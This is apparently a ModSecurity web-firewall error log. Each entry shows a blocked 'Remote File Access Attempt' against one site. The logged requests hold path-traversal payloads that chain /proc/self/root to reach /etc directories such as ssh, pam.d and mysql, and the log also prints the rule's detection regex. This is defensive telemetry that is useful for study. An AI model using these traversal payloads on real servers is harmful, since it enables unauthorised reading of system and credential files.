[Mon Mar 16 11:02:32.396607 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:51076] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNeJqj1wV0Si-OkefhDAAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:33.740654 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.243.203:51090] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNebABkC4fWIHEf8HiKgAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:35.055005 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:51102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNe7ysWC90G-1nBrA6xgAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:37.310110 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.243.203:51104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNfLysWC90G-1nBrA6xwAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:38.669331 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:51114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNfhXjF1vJNtV6CWruOwAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:39.943326 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:51128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNf3bQATo66fKoS7xEJgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:41.178209 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:46734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNgQlT9VtDQc7bgUyjrQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:42.472257 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:46746] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNgglT9VtDQc7bgUyjrwAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:43.728741 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:46752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNgwlT9VtDQc7bgUyjswAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:45.043718 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:46768] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNhQlT9VtDQc7bgUyjuAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:46.410237 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.243.203:46770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNhglT9VtDQc7bgUyjvQAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:47.663495 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:46786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNhxXjF1vJNtV6CWruPAAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:48.938304 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.243.203:46792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNiHbQATo66fKoS7xELwAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:50.106221 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:39148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNirABkC4fWIHEf8HiMAAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:51.413795 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:39160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNi5qj1wV0Si-OkefhDgAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:52.707585 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:39164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNjHjZBu2q05ozVU9LrwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:54.017912 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:39178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNjrysWC90G-1nBrA6yAAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:56.390108 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:39184] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNkLABkC4fWIHEf8HiMgAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:57.663695 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:39186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNkQlT9VtDQc7bgUyjyQAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:58.822195 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:39192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNkglT9VtDQc7bgUyjzAAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:03:00.129304 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:39204] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNlJqj1wV0Si-OkefhFwAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
